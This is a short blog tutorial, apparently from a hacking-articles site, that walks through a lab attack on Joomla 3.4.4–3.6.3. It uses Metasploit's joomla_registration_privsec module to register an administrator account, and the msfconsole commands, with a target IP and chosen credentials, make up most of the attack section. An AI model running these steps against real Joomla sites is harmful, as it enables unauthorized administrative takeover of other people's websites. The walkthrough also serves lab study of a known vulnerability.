In this article we will
learn about hacking Joomla CMS. And to so we will be a pre-instaled module of
metasploit which will further help us to create an autocratic account with
administrative privileges in Joomla versions 3.4.4 through 3.6.3. Ttherefore, if
an email server is arranged in Joomla, an email will be sent to activate the
account (the account is disabled by default).
Exploit Targets
Joomla
3.4.4 through 3.6.3
Requirement
Attacker: kali Linux
Victim PC: Joomla 3.4.4
Open
terminal in Kali and type msfconsole to start
metasploit.
use auxiliary/admin/http/joomla_registration_privsec
msf
exploit (joomla_registration_privsec)>set rhost 192.168.0.103
msf
exploit (joomla_registration_privsec)>set username raj
msf
exploit (joomla_registration_privsec)>set password raj123
msf
exploit (joomla_registration_privsec)>set email raj@hackingarticles.in
msf
exploit (joomla_registration_privsec)>exploit
Performing
this attack will allow you to create a desirable username and password like in
this case I have given username : raj and password : raj123 along with email
ID : raj@hackingarticles.in
In
the image below you can see that a new user wil be created by the username and
passwords that you provided.
And as you have created a username you can log in using the
said username.
Thus, you can hack Joomla CMS in the most simplest of the
way.
0 comments:
Post a Comment